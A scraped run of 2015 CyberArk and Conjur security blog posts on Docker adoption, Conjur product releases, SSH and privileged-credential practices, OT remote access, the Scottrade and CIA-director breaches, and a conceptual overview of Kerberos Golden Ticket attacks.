Everyone’s Using Docker, Now It’s Time to Secure It https://www.cyberark.com/blog/everyones-using-docker-now-its-time-to-secure-it/ Wed, 11 Nov 2015 13:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/everyones-using-docker-now-its-time-to-secure-it/  

Docker seems to be gaining some much deserved momentum lately. According to studies conducted by Datadog, Docker adoption is more common among large firms, despite the common assumption that large enterprises are typically the slowest to adopt new technologies.

It seems fitting, however, that bigger organizations are quickly adopting this technology as they move to hybrid cloud environments and continuous delivery workflows.

Security Solution for Docker ContainersAdoption seems to be exploding, especially since the last couple of years Docker has had virtually no real position in the market. Of the 7,000 companies Datadog studied, 8.3% had adopted Docker, an almost 5x increase from the last year’s 1.8%. Of the hosts monitored by Datadog, Docker runs on 6%. Companies are clearly liking this new wave of container technology and these numbers will only increase in the coming months.

Docker seems to have their customer delight down to a science. Most people who try Docker end up using it, becoming customers within 30-60 days of starting their trail. For these new customers, the number of containers they have triple between their first and sixth month of use.

Typically, hosts will run 4 Docker containers at a time, each container having a lifespan of about 3 days. This is interesting because although Docker is used to providing a “knowable, versioned runtime environment”: it is also regularly used to allocate compute resources.

This is great news for Docker and other enterprises that want to package applications for development. As adoption of Docker is quickly increasing so will the need for a complete security solution for docker containers. Conjur’s Dynamic Traffic Authorization platform provides security to Docker containers by giving each container a unique identity.

The containers will also  have a unique set of access controls. In order to prevent high-risk credentials from being passed, a temporary token is granted to inbound traffic. With Conjur, containers are able to filter inbound and outbound traffic. A complete audit of all static and ephemeral services makes it easy to see everything going on in your containers’ environment.

Of course, the purpose of using a tool like Docker is to keep your continuous delivery agile. Conjur allows development, operations, security, and compliance teams to move at speed while still being safely managed and monitored.

 

]]>
New Conjur API Documentation Released https://www.cyberark.com/blog/new-conjur-api-documentation-released/ Tue, 10 Nov 2015 17:29:00 +0000 https://cyberarkvx2.wpengine.com/blog/new-conjur-api-documentation-released/  

Today we’re excited to announce the release of our new  API documentation.

 

We hope the improved content, as well as user experience, will help you leverage Conjur in many different ways going forward.

Conjur Releases New API Documentation

Why we did it:

  1. All API routes are now documented.
  2. There is now an example for every route, showing a real-world use case.
  3. Routes are now more easily discoverable and linkable.
  4. Documenting our API in a standard spec (API Blueprint) allows us to easily generate Conjur client tooling for any language you require.

Additionally, soon you will be able to make API calls to your Conjur install directly from the API docs. Debugging and learning the API will be much easier.

Check out the API documentation and please feel free to share any feedback in the comments section below.


 

]]>
7 Essential Resources To Start Your Cloud Transformation https://www.cyberark.com/blog/7-essential-resources-to-start-your-cloud-transformation/ Fri, 06 Nov 2015 19:48:00 +0000 https://cyberarkvx2.wpengine.com/blog/7-essential-resources-to-start-your-cloud-transformation/  

Getting started with a cloud transformation project is a tall task.  The sheer amount of technical and cultural decisions that need to be made could make anyone’s head spin.  While there will never be a silver bullet solution to help you through the process, it is vitally important to crowd source other’s experiences before you set out to conquer your goal.

Start Your Cloud TransformationFor this post we asked ourselves, if we were starting a massive cloud transformation project, where would we start?  The list below is a great entry-to-intermediate level, non-exhaustive summary of some of the resources we hope you find most helpful if you find yourself in a similar situation:

SD Architect

Sanjeev Sharma is a Tech Sales specialist at IBM and author of DevOps for Dummies.  The best part of Sanjeev’s blog is his in-depth coverage of the basics, such as Understand DevOps and Adopting DevOps.  Through a mix of written content, video, and slide presentations, Sanjeev’s content will satisfy all types of learners through the lens of beginner’s eyes.

The Agile Admin

This amazing blog is written by a group of experienced Web systems administrators and developers who met while working at National Instruments.  According to their site, their shared vision is to help turn systems work into a recognized and effective discipline.  They cover a variety of topics such as cloud computing, DevOps, agile operations, infrastructure automation, and Web security.

IT Revolution Press

Gene Kim is well known for his book, The Phoenix Project: A Novel about IT, DevOps, and Helping your business win.  Gene’s blog, IT Revolution Press, focused on the economic and human costs of cloud transformation.  As the site explains, “We aim to positively influence the lives of 1 million IT people over the next 5 years.  To make this happen, we’re uniting thought leaders in a ll the relevant domains with a common sense of purpose and passion to help us achieve our goal and improve IT for generations to come.”  

Arrested DevOps [Podcast]

If you like to digest your content by way of audio, then this podcast is a must listen.  Arrested DevOps is hosted by Matt Stratton, Trevor Hess, and Bridget Kromhout.  They describe their podcast as one that helps listeners achieve understanding, develop good practices, and operate their teams and businesses for maximum DevOps awesomeness.  With dozens of podcasts ranging in topic from, ‘What is DevOps, to ‘ITIL Eye for the DevOps Folks’, there are a lot of great lessons to learn from these front-line experts.

DevOps Guys

The DevOps Guys, otherwise known as Steve Thair and James Smith, provide a forum based on their over 15  years of experience that aims to facilitate, share, and explore DevOps best practices.  They hope their blog inspires others to share their experiences so the next generation of leaders can get a head start at transforming their IT environments.

DevOps.com

Launched in 2014, DevOps.com has quickly established itself as an indispensable resource for DevOps education and community building. They make it their mission to cover all aspects of DevOps—philosophy, tools, business impact, best practices and more.  Their content includes in-depth features, bylined articles, blog posts and breaking news about the topics that resonate with IT readers interested in DevOps.

Do you have any other websites, blogs, subreddits, or podcasts that have helped your organization begin to shift how your IT and Applications are deployed and managed?  If so please share below in the comments.

 

]]>
Privileged Credentials within Commercial off-the-shelf (COTS) Applications Creates an Exponential Security Threat https://www.cyberark.com/blog/privileged-credentials-within-commercial-off-the-shelf-cots-applications-creates-an-exponential-security-threat/ Thu, 05 Nov 2015 20:44:47 +0000 https://www.cyberark.com/blog//

CyberArk’s Executive Vice President Adam Bosnian regularly talks to customers, partners and security experts. He is also frequently invited to conferences to address security trends, so we’d like to share some of his recent insights.

Q1: What trends do you see in the market related to privileged account security?

Adam:  Most information security professionals recognize that the cyber security battleground has shifted from the network perimeter to the inside of the enterprise. Often attackers seek to exploit privileged accounts specifically, given the extensive control and access to sensitive data they provide. As a result, the need to secure, manage and track privileged account access is increasingly understood and accepted. Many C-level security professionals have enterprise-wide mandates to address what is now viewed as a horizontal risk.

Despite this widespread understanding of the importance of locking down privileged account access, some continue to equate privileged credentials with IT admin users alone. The reality is that access is not limited to users with a “heart beat,” and in fact, many COTs applications often require the same access to privileged accounts.  Recognition of this security risk is growing, and we’ve had a number of our customers and software application partners contact us to help them more effectively address this vulnerability.  Ultimately, an enterprise-wide privileged access mandate should cover all “sources” of privileged users/access to be effective.

 

Q2: So, COTS applications use the SAME level of privileged access to target systems as IT Admins?

Adam:  Yes they do, and awareness of this security vector is low, but growing. Many COTS applications require some privileged access to perform necessary functions.  Whether it is a vulnerability or asset discovery application or an IT operations management service, administrative privileges are provided by the organization to access virtually every asset on the network.

These privileged credentials are usually defined once for each application and reside in applications or scripts, or they are stored in configuration files within networks, servers and databases. With hundreds of commercial application privileged credentials to manage manually, and for the sake of operational simplicity, these credentials have remained unchanged.

As a result, each application becomes a significant threat and potential pathway for cyber attackers.  Understanding the relationship between privileged credentials and COTS applications has become an “ah- ha” moment for our customers and partners. They want to have a centralized credential management system in place covering all types of access regardless if by an IT user or COTS application.

 

Q3: How should organizations secure critical COTS applications?

Adam:  They should stop using credentials that are statically stored in the COTS application, databases scripts, or are stored in configuration files as they can easily be captured by attackers. They need a system to automatically manage, secure and rotate credentialed access to privileged accounts.

Companies will often start with a discovery process to inventory the applications they have organization-wide and pinpoint what vulnerabilities exist. There are tools specifically designed to scan the entire IT environment to find privileged user AND application accounts, and the associated credentials. A growing number of customers have asked the application vendors they use (often our partners) to work with us to securely manage the access their applications require.

For example, CyberArk offers integrations of CyberArk Application Identity Manager™ with leading commercial IT applications. Together, we help our shared customers to eliminate credentials (passwords and SSH keys) from commercial applications, application scripts and/or configuration files. Instead they store them in the CyberArk Digital Vault® and automatically rotate the credentials used to authenticate to the organization’s target systems. With CyberArk Application Identity Manager, organizations will not only reduce the risk of unauthorized application credentials usage and be able to detect and alert on credential usage anomalies, but will also simplify credentials management.

 

Q4: Is this focus on securing applications new?

No. In fact, CyberArk Application Identity Manger has been available and used by many of our customers for years.  Early on, companies used to manage in-house applications with this product, but as awareness around the security risks associated with privileged accounts increases, companies are paying closer attention to vulnerabilities associated with COTS applications as part of their holistic privileged account security strategy.

To learn more about how CyberArk can help you address your privileged account risk and secure privileged credentials accessed by both users and applications, download our free eBook, Seven Things To Consider When Evaluating Privileged Account Security Solutions.

]]>
Proactive Preventive Measures or Remediation: Same Actions, Different Timing https://www.cyberark.com/blog/proactive-preventive-measures-or-remediation-same-actions-different-timing/ Tue, 03 Nov 2015 18:19:41 +0000 https://www.cyberark.com/blog//

Three measures to protect privileged accounts

Benjamin Franklin once famously said, “An ounce of prevention is worth a pound of cure.” Cyber attacks are now common worldwide – Anthem, Carphone Warehouse, the German parliament, K Box Singapore, Sony Pictures, TV5Monde and the U.S. Office of Personnel Management (OPM) – and they take a tremendous economic toll. Industry estimates show that malicious cyber activities worldwide cost $300 billion to $1 trillion in losses annually.

The world’s top cyber investigators continue to see a common thread across these dangerous, targeted attacks and security breaches: the exploitation of privileged accounts. These accounts grant extensive control over sensitive data and IT systems, they’re pervasive in every organization, they’re often overlooked and therefore present a path of least resistance, and they can be powerful weapons in the wrong hands.

As the leader of CyberArk’s consulting services, my team and I regularly work with organizations, during and immediately following security incidents, to rapidly introduce controls on privileged accounts. Lessons learned from these events can be used to proactively protect against threats. Experience shows the recommendations really aren’t optional; it’s just a matter of time before organizations will have to implement them, and if it’s in response to a breach, it will be more painful.

At a high level, there are three recommended measures every company should take to proactively protect privileged accounts:

  1. Reduce the attack surface. The sheer volume of existing privileged accounts makes effective controls unwieldy and this creates an easy path for attackers. Don’t make it easy for them; reduce the number of privileged accounts – both shared and personal.Review your sensitive groups – think “Domain Admins” – and fiercely question whether the privilege is necessary. Eliminate accounts entirely where possible. Personal privileged accounts are difficult to control. They possess the same privileges as your shared accounts, but also face the classic challenges of human identity management.For our customers, we recommend removing personal privileged accounts and replacing them with shared accounts via CyberArk technology. Ultimately, these accounts require the same level of control, and this approach reduces IdM overhead and vastly improves security.
  2. Isolate sensitive assets and accounts. Sensitive assets and highly privileged accounts should never be accessed directly from workstations. Workstations are often an attacker’s beachhead, and determined attackers can find ways to reach them. Preventing privileged accounts from crossing trust levels, i.e. not using the same account to access servers and workstations, and isolating sensitive assets by restricting access to a highly secure working environment is essential to contain an attacker’s ability to complete their mission.
  3. Protect privilege with strong authentication. Deploying native two-factor authentication integrations across all technology platforms is complex, time consuming, and for legacy (and often business critical) technologies often exceedingly difficult. Despite these challenges, deploying strong authentication is essential to protect systems and sensitive data.

For our customers, we recommend isolating privileged sessions and replacing personal privileged accounts with CyberArk-controlled shared accounts.  This can simplify the strong authentication objective by being the intermediary for privileged access and thereby enforcing strong authentication requirements across the board.

For additional tips on protecting privileged accounts, you can also read our Best Practices Guide: The Three Phases of Securing Privileged Accounts.

]]>
The Director of the CIA Hacked, By A High Schooler https://www.cyberark.com/blog/the-director-of-the-cia-hacked-by-a-high-schooler/ Mon, 02 Nov 2015 16:32:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-director-of-the-cia-hacked-by-a-high-schooler/  

The personal AOL account of CIA Director John Brennan was recently hacked by a couple of high school students. When we think about the CIA we typically imagine savvy spies and futuristic technologies. The reality, however, seems a lot less impressive after learning that the email security for the CIA is about as impenetrable as our own. 

This was not a high tech breach; these were no expert hackers or highly skilled coders.  This was just a few kids who got creative and were able to breach the email of one of the most powerful members of the CIA. You would think that government officials, who are privy to sensitive information on a daily basis, would work harder to make sure their data was secure.  But this story shouldn’t surprise us, in 2014 783 data breaches were reported, and in those breaches at least  85.61 million records were compromised. However, I think we are still shocked when some of the most powerful people in society get breached, as they have the means and resources to strive for better.

Here are all of the details: 
The New York posts reports that according to the hacker, the email account also had information about the government’s use of “harsh interrogation techniques”.  It is assumed that the hacker will likely face criminal charges in order to set an example and deter other hackers from trying something similar in the future.Wired covers the report given by the supposed high school aged hacker of how he carried out the breach. The hacker says he posed as a Verizon worker and had two friends help him. The group also hacked into the Comcast account of Homeland Security Secretary, Jeh Johnson.

This article by Amanda Vicinanzo points out that despite the number of high profile, costly breaches that occur on what seems like a weekly basis, cybersecurity still is not taken very seriously. This attack was less sophisticated than most, the hacker using social engineering to gain access to Mr. Brennan’s personal AOL account.

Brennan argues that he wasn’t being negligent with his personal email. The truth remains, however, that he had highly sensitive information in his email account, including the personal information and social security numbers of the CIA’s top intelligence officials and his confidential 47 page application for security clearance.  This alarming lack of accountability and responsibility doesn’t help matters much, as it begs the question, will he be more careful in the future? If he is unwilling to take even some responsibility for the breach why would he bother changing his habits?

There will always be hackers, there will always be bad guys trying to infiltrate our systems. If we are going to hold on to sensitive data we have an obligation to take every possible step to make sure it remains secure.

Want to learn more about securing your secrets, check out our secrets management checklist.

 

]]>
Fast Facts: Noteworthy Cyber Security Statistics https://www.cyberark.com/blog/fast-facts-noteworthy-cyber-security-statistics/ Fri, 30 Oct 2015 19:02:41 +0000 https://www.cyberark.com/blog//

October is National Cyber Security Awareness Month (CSAM), and a lot of great information, highlighting tips and best practices, has been shared to inform businesses and individuals. In support of #CyberAware, we’ve compiled a selection of interesting statistics and insights about cyber security incidents and threat vectors.

At-a-glance:

The cyber security disconnect:

The National Cyber Security Alliance has put together a helpful list of free resources to help organizations and individuals stay safe online. For tips on how to protect your organization’s most valuable assets be sure to visit the CyberArk Resource Center.

 

]]>
5 IT Best Practices that Also Mitigate Cyber Security Vulnerabilities in OT https://www.cyberark.com/blog/5-it-best-practices-that-also-mitigate-cyber-security-vulnerabilities-in-ot/ Thu, 29 Oct 2015 18:54:57 +0000 https://www.cyberark.com/blog//

Recently, I attended NERC’s annual Grid Security Conference (GridSecCon) in Philadelphia. A group of cyber security and other industry experts convened to share best practices, lessons learned and emerging security trends. Protecting the grid was the topic on everyone’s mind as well as the theme for the conference. As the sophistication and number of cyber attacks on critical infrastructure increases, it’s more important than ever to understand the landscape of entry points. This landscape extends to remote entry points. So it’s no surprise that supply chain security was also a hot topic of discussion at the conference, particularly in light of a string of recent breaches that demonstrate some of the vulnerabilities exposed by unsecured remote user access.

In Operational Technology (OT), supply chain management includes the oversight of users, both internal and external to the organization, who require access to the industrial control system networks in order to perform a myriad of functions ranging from preventive maintenance to reporting to break-fix services. These remote users perform critical functions that contribute to the plant’s reliable operations. However, remote access into a plant’s industrial control system exposes additional vulnerabilities that can be exploited by malicious actors.

The energy sector is leading the way in taking measures to secure critical assets and share information about remote access best practices and technologies that help to mitigate the impact of a potential cyber-attack. A number of security measures implemented by energy companies can be extended into other industries, and in fact, some of the measures are part of other standards and best practices such as the NIST 800-82 Revision 2: Industrial Control System (ICS) security.

To better protect your organization from threats associated with remote access, consider implementing the following five practices to address IT-OT connectivity vulnerabilities:

  1. Identify all remote users, accounts and associated credentials. Be sure to include SSH keys, hard-coded credentials and passwords to get visibility into who is accessing an organization’s critical systems.
  2. Lock down credentials. Once all remote users, accounts and credentials are identified, it’s time to centrally store the credentials in a locked and safe environment where they can be more effectively managed. The users can then securely retrieve the password or SSH key, or request a direct connection to only the accounts they are authorized to access.
  3. Minimize direct connection to critical assets. Isolating all sessions originating outside of the ICS domain and from unmanaged devices minimizes direct connections to any critical assets and keeps credentials shielded from unauthorized users.
  4. Trust but verify – keep an eye on remote users. Implementing live monitoring and session recording can facilitate the identification of unauthorized activity. It can also help to confirm that remote users access only those systems they are authorized to see. Session monitoring and logging also supports compliance with industry regulations and standards.
  5. Deploy analytics tools. To meet high availability requirements, early detection and alerts are key. Analytics tools can identify user and application patterns which in turn can be used to create privileged user and account profiles of normal behavior. When abnormal activity is detected and alerted, incident response teams can address and disrupt in-progress attacks.
]]>
5 SSH Best Practices You Can Start Implementing Today https://www.cyberark.com/blog/5-ssh-best-practices-you-can-start-implementing-today/ Wed, 28 Oct 2015 20:52:00 +0000 https://cyberarkvx2.wpengine.com/blog/5-ssh-best-practices-you-can-start-implementing-today/  

As cybersecurity month is coming to a close, it seems only fitting to provide you with some advice on maintaining your enterprise’s security all year long.

One of the hardest things to manage in large, agile enterprises are SSH keys. As your infrastructure grows, so will the amount of SSH keys and privileged accounts that you need to manage and as these numbers hit the thousands, administering and maintaining these roles will be difficult.

A study by the Ponemon Institute found that 51% of organizations aren’t even aware of how many keys and certificates are used by their organization. Not knowing where or how these keys and certificates are being used means that an enterprise is completely vulnerable to attacks. These attacks on trust are very costly since they are so difficult to detect, usually targeting acute areas. Follow our SSH best practices to ensure that security isn’t neglected for the sake of agility.

Here are 5 SSH best practices you can start implementing today:

1) Don’t confuse Authorization with Authentication.  

 Authentication is used to establish identity; authorization is used to determine access levels and permissions.  For more detail check out this blog post.

2) Always Audit

It is critical to keep a constant log of both the failed and successful login attempts of all of your hosts.  A public key pushing system won’t tell you the difference between a stranger claiming to be someone you know and someone you know trying to access information that they aren’t authorized to access.

3) Don’t Share Your Private Key…EVER.

Although Public Keys shouldn’t be treated like secrets, private keys should.  Never distribute your private key to any system or person; if you need to authenticate yourself  just share your public key. Remember: Your public key is safely sharable but your private key is not.

4) Schedule SSH Key Rotation

Key rotation should always be part of your overall security plan. If you work under strict regulatory and compliance laws then this is especially important.  Find a tool that not only easily rotates your keys, but also keeps an audit log of which keys were rotated and when.

5) Centralized Key Management

Each developer should have their own unique login and set of privileges. This way, you can easily create and delete new ssh keys.  Don’t use manual methods to distribute and create ssh keys; this non-automatic system won’t remain secure or scalable as your environment grows.

Want more tips like this? Subscribe to our blog and keep up with the latest information in IT Security.

 

]]>
New Conjur CLI v4.28.0 Release https://www.cyberark.com/blog/new-conjur-cli-v4-28-0-release/ Wed, 28 Oct 2015 15:54:00 +0000 https://cyberarkvx2.wpengine.com/blog/new-conjur-cli-v4-28-0-release/  

We have just released Conjur CLI v4.28.0!

The big change is that you can now retire policies. Read more about policies here.

These bugs were also fixed:

  • Fix –as-group and –as-role options for conjur policy load. Either can now be used to specify ownership of the policy.
  • Fix –follow option for conjur audit.

We have also removed support for per-project .conjurrc files. This was a legacy feature that doesn’t fit with the modern Conjur workflow.

Head to the Conjur devsite to download the updated CLI: https://developer.conjur.net/cli

 

]]>
PuppetConf 2015 Recap https://www.cyberark.com/blog/puppetconf-2015-recap/ Tue, 27 Oct 2015 15:43:00 +0000 https://cyberarkvx2.wpengine.com/blog/puppetconf-2015-recap/  

During the first week of October I had the pleasure of attending my first PuppetConf in lovely Portland, Oregon.  Armed with plenty of swag, a smile, and a can’t-miss raffle prize (6 month memberships to the Bacon of the Month Club as well as the Craft Beer of the Month Club), I was ready for action.

An enthusiastic attendee asked, “Is this what you guys do? Beer & Bacon?!” After a back-and-forth about Conjur’s security orchestration platform for dynamic infrastructure, he wanted two things: “First, get me that info on Conjur’s Puppet, Jenkins, and Docker solutions. And then, make sure I win that beer & bacon.”

(Top 10 ‘why I should win the beer & bacon’ notes at the end.)

One more thing pulled new and veteran Puppeteers to the booth, the eye candy that is the revamped Conjur UI:

yourconjurdashboard

As one visitor put it, “My security folks are just gonna love that magenta.”

Once the UI-gazers & beer/bacon lovers learned that Conjur VP Josh Bregman was giving a talk on Using Puppet with a Secrets Server, the questions poured out:

  • “So, what exactly does Conjur do?”

– Conjur orchestrates privileged user and machine identity at scale.

  • “Do you integrate with other tools in addition to Puppet?”

– Yes

  • “What if we have LDAP and AD?”

– That’s fine. Conjur offers both LDAP & AD sync.

  • “Is Conjur open-source?”

– Conjur is an enterprise-grade platform.  We do have an open-source secrets project called Summon.

  • “How do I get to see it in action?”

– Request a live demo, and I’ll get in touch with you.

All our conversations confirmed something important: even for organizations sending people to PuppetConf, maturity varies widely. Puppet is both brand new and second nature; containers are in test almost everywhere, and even in production some places; better continuous integration and delivery are across-the-board goals. Throughout all of it, though, shone an eagerness for anything that helps manage credentials and keys more securely, and scales across HA environments better than boot-strapped, home-grown, or open-source tools. This strikes a particular note for us here at Conjur.

Increasingly gone seem the days when security, audit, and compliance were ‘someone’s problem.’ Agile development has really begun putting a face to that ‘someone,’ and everyone involved is beginning to realize that that face looks a lot like the one they see in the mirror.

The one I see needs to get back to pre-PuppetConf amounts of bacon – turns out, talking about that and beer repeatedly for three days apparently has one or two longer-lasting consequences. I’m sure that our winner will be able to show more restraint as he enjoys those 6 months of craft beer and bacon with the perfect shirt to wear while he does:

beerbacon

A great thanks to all those who came and talked Conjur, as well as to our fellow vendors, the conference team and, of course, Puppet Labs. Looking forward to sunny San Diego next year!

Now, for the Top 10 reasons people gave for why they should win the beer & bacon (even though they knew it wouldn’t help them do so):

10. “Thank You!” – presumptive close, nice

9. “Pik M3” – time-saver spelling

8. “I like hops” – hoppy bacon?

7. “Because you love me!!!” – even more presumptive close, nicer?

6. “Beets, Bears, and Battlestar Galactica.” – awesome alliteration

5. “BACONNNNNNN” – 7 N’s spell enthusiasm

4. “Beardo!” – missing verse from Ole McDonald

3. “I want t-shirt” – caveman-esque brevity

2. “Eh, anything you want to put in there!” – word for word what I said when he asked what to write.

1. “I’d really like to win because I am bacon and beer’s best fan on the planet, and since the recent discovery of water on mars, quite possibly the solar system.” – we’ll just have to ask Matt Damon.

 

]]>
Do You Know Where Your Secrets Are? https://www.cyberark.com/blog/do-you-know-where-your-secrets-are/ Fri, 16 Oct 2015 15:13:00 +0000 https://cyberarkvx2.wpengine.com/blog/do-you-know-where-your-secrets-are/  

October isn’t just about apple picking, hayrides, and pumpkin spice lattes… it’s also cybersecurity month! Although Conjur kicked the month off on the right foot, the same can’t be said for everyone. It looks like cybersecurity month is off to a rough start at Scottrade, the business having suffered a major breach that was publicized in recent weeks.

Imagine that your company was approached by the FBI, and was told that criminals had taken your clients’ information and have had it at their disposal for the past two years. Well, that’s the real life nightmare Scottrade is faced with. The most troubling aspect of the Scottrade breach is that it went unnoticed for two years. This forces us to wonder, how much of our data has been compromised that we don’t even know about… what if our information is being taken right now?   Without a second thought we buy insurance, apply for loans, sign up for cell phone plans, and make online purchases. And without a second thought, businesses take this information and store it, gambling with our personal details and hoping that their databases are secure enough to resist a breach, without taking any real, meaningful steps to ensure this is the case. With PR nightmares like this one, I have to wonder, why aren’t companies keeping a closer eye on their secrets?

Although the breach occurred two years ago, it was only recently that Scottrade uncovered the hack in their system. The FBI alerted Scottrade to the breach that exposed the personal information of over 4.6 million customers. Although Scottrade maintains that only the names and addresses of customers were taken, it is highly likely that other information was compromised as well. The systems containing the contact information also stored social security numbers, according to Threatpost. Marketwatch cautions customers that brokerage numbers are also on the list of potentially compromised data.

This information further validates the assumption that more than just names and addresses were exposed, despite Scottrade’s insistence that contact information was the hackers’ main focus. When questioned as to how Scottrade came to this conclusion, Scottrade could not answer, stating that it could jeopardize the investigation. It may never be revealed what information was actually taken from Scottrade, as most companies don’t keep data that old in their systems. Customers are angry, including one Scottrade customer who has decided to sue the company in a class-action lawsuit. The suit requests that Scottrade not only pay for at least 3 years of credit and identity monitoring for compromised customers, but also repay any monetary, statutory, and punitive damages.

It is common for enterprises to cut costs wherever possible; however, security is not the place to skimp on resources. These breaches are a lot more expensive than the costs associated with properly securing infrastructures in the first place. According to research by the Ponemon Institute, data breaches cost companies approximately $3.8 million dollars (an increase from last year’s cost of $3.5 million). For businesses, breaches affect more than just their wallet, they also taint the reputations they have worked so hard to create. Every single week consumers are faced with a new company they can no longer trust and are ridden with heightened paranoia every time they give out a social security number or use a credit card. The problem now is that not only are these breaches happening, but they are taking far too long to be detected. People are only aware of the fraud once it is too late and this fraudulent activity is difficult to remedy.

If Scottrade had a clear and easily accessible audit log, it wouldn’t have taken so long to notice suspicious behavior in their systems. High velocity organizations who practice continuous delivery rely on many dynamic tools, users, and machines. All of these complexities make it difficult to scale security in the name of velocity. Companies need secrets management solutions that are scalable with both machine authentication and granular access control . With the correct security measures in place to manage secrets, hackers would have been denied access to the system in the first place.

For more information on proper secrets management, download our secrets management checklist.

Worried about your cybersecurity this October? Remember, the best defense is an even better offense.

 

]]>
Cutting-Edge Reports User Interface among Improvements in New Conjur Release https://www.cyberark.com/blog/cutting-edge-reports-user-interface-among-improvements-in-new-conjur-release/ Wed, 14 Oct 2015 12:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/cutting-edge-reports-user-interface-among-improvements-in-new-conjur-release/  

Conjur 4.5 Provides Greater Transparency, Compliance Reporting for High Velocity IT Infrastructures; Reports UI Crucial Tool for Understanding, Reporting on Permissions that Govern IT Infrastructure

WALTHAM, Mass. Oct. 14, 2015 Conjur, Inc., provider of security orchestration software, released a new software version that improves enterprises’ ability to report on infrastructure assets such as secrets, Web services, users, groups, jobs, containers and machines. Conjur’s platform extends identity and role-based access management beyond people and into infrastructure and software platforms.

“Conjur 4.5 furthers our enterprise core technology while enabling a wider audience to realize immediate benefit from securing infrastructure with Conjur,” said Mitch Haile, Vice President of Products at Conjur. “With this release, security and compliance leaders now have dashboards and reports for compliance audits that enable greater transparency into their ever-changing IT environment.”

8-26-15-dashboard

Traditionally, operations and security personnel have struggled to create comprehensive policies and reports that fully enumerate the users and software that have access to all of the moving parts of a continuous delivery environment. As projects, people and architectures change, it becomes very difficult to know who has access to what and when. Conjur solves this problem with an operational API and clear dashboard that highlights the latest activity and enables organizations to easily integrate with tools such as Docker, Puppet and Jenkins.

Additional improvements in Conjur 4.5 include:

  • Dynamic Traffic Authorization: This feature allows policy-based authorization and audit of HTTP(S) traffic. It secures REST APIs, Docker containers and microservices without code modification.
  • Active Directory + LDAP Synchronization: The new release supports synchronization with Active Directory and other LDAP directory services so that Conjur policies can be applied to resources mastered in those directories. In addition, Conjur users can authenticate to Conjur using their AD or LDAP password.
  • Global Permissions – Elevate and Reveal: These permissions grant certain roles the ability to bypass permission checks, either to modify the permissions model or to view it without sacrificing audit capabilities.
  • Ships as a Docker Image: Conjur 4.5 now ships as a Docker image so that modern IT infrastructures can deploy and manage Conjur HA using container orchestration technology.
  • High Availability Enhancements: The new operational and management features make configuring and operating replicated Conjur installations easier than ever before, while still retaining the robust features that have powered Conjur installations around the globe.

Conjur 4.5 is available immediately at: https://info.conjur.net/demo.

Conjur 4.5 Technical Release Notes:  https://developer.conjur.net/release-notes

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based open source tools so that security best practices can become part of every software development activity and IT environment. Customers include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow on Twitter @conjurinc.

 

]]>
Kerberos Attacks: What You Need to Know https://www.cyberark.com/blog/kerberos-attacks-what-you-need-to-know/ Fri, 09 Oct 2015 14:38:41 +0000 https://www.cyberark.com/blog//

Privileged account exploitation is at the center of targeted cyber attacks, and post-mortems of today’s most high-profile breaches – from Sony Pictures to Office of Personnel Management (OPM) – reveal an increasingly predictable pattern.  Attackers crash through the network perimeter, hijack credentials and use them to move laterally throughout the network, taking additional credentials and escalating privileges along the way to accomplish their goals.

Combining privileged accounts with attacks on the Kerberos authentication in Windows domains raises the stakes of the cyber threat. During such attacks, threat actors target domain administrator privileges, which provide unrestricted access and control of the IT landscape. Armed with these privileges, attackers can stealthily manipulate Domain Controllers (and Active Directory) and generate Kerberos tickets to obtain unauthorized access.

Identified as one of the most dangerous attack techniques at this year’s RSA Conference, Kerberos attacks are troublesome for three primary reasons:

  • Access: Once an attacker has Local Admin privileges, it is possible to dump additional credentials, which if left behind in the compromised machines, enable the attacker to move laterally in the network, elevate privileges and gain unauthorized access to valuable assets.
  • Obscurity: To bypass security controls and evade detection, an attacker can reuse Kerberos tickets to impersonate authorized users and sidestep authentication processes – disguising activity and avoiding authentication log traces.
  • Persistence: The days of stolen data being dumped all at once are largely over – attackers often prefer to remain on the network undiscovered for extended periods of time, funneling information out little –by – little. Kerberos attacks give attackers what they need most to do this: time. It is possible to maintain persistence with Kerberos tickets, even when credentials have been changed.

While there are several types of attacks on authentication protocols – including Pass-the-Hash, Overpass-the-Hash and Pass-the-Ticket – the most destructive of all is the Golden Ticket. This technique can mean “game over” for an organization and complete loss of trust in the IT infrastructure.

InfoWorld’s Robert Grimes well described this devastating attack in his article, Fear the Golden Ticket Attack, when he wrote, “If you have domain admin/local admin access on an Active Directory forest/domain, you can manipulate Kerberos tickets to get unauthorized access. A golden ticket attack is one in which you create a Kerberos-generating ticket that is good for 10 years or however long you choose. You can be anyone (assuming you have their hash), add any account to any group (including highly privileged groups), and for that matter, do anything you want within Kerberos authentication capabilities. You can even create usable Kerberos tickets for user/computer/service accounts that don’t even exist in Active Directory. A golden ticket isn’t merely a forged Kerberos ticket – it’s a forged Kerberos key distribution center.”

Executing this level of attack requires domain administrator credentials, putting these credentials directly in the crosshairs of any advanced attacker or malicious insider. To maintain control of your IT infrastructure, it is absolutely critical to prevent attackers from ever compromising a domain administrator credential.

CyberArk’s latest Global Advanced Threat Landscape Survey revealed that far too many organizations remain focused on defending against perimeter attacks, including phishing, while discounting attacks launched from deep inside an organization, such as Kerberos attacks, that can be the most devastating. To help organizations fully understand the severity of Kerberos attacks and take actionable steps to reduce risk, we’ve developed a white paper – Maintain Control of Your Business: Protect Your Domain Controller from Kerberos Attacks – which is available for download. Learn about:

  • Several increasingly prevalent Kerberos attack methods, which can enable control over a target’s network by commandeering the domain controller;
  • Key strategies for reducing risk and blocking an attacker’s progress at two critical phases of the attack lifecycle: credential theft and lateral movement;
  • The integral role of analytics and machine learning for early detection of anomalous activity and rapid response to in-progress attacks.

We encourage you to download this free resource today. And be sure to tune in regularly as we delve further into the little-understood world of Kerberos attacks.

]]>
The Big Shift: Static to Dynamic Security Models https://www.cyberark.com/blog/the-big-shift-static-to-dynamic-security-models/ Thu, 08 Oct 2015 15:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-big-shift-static-to-dynamic-security-models/  

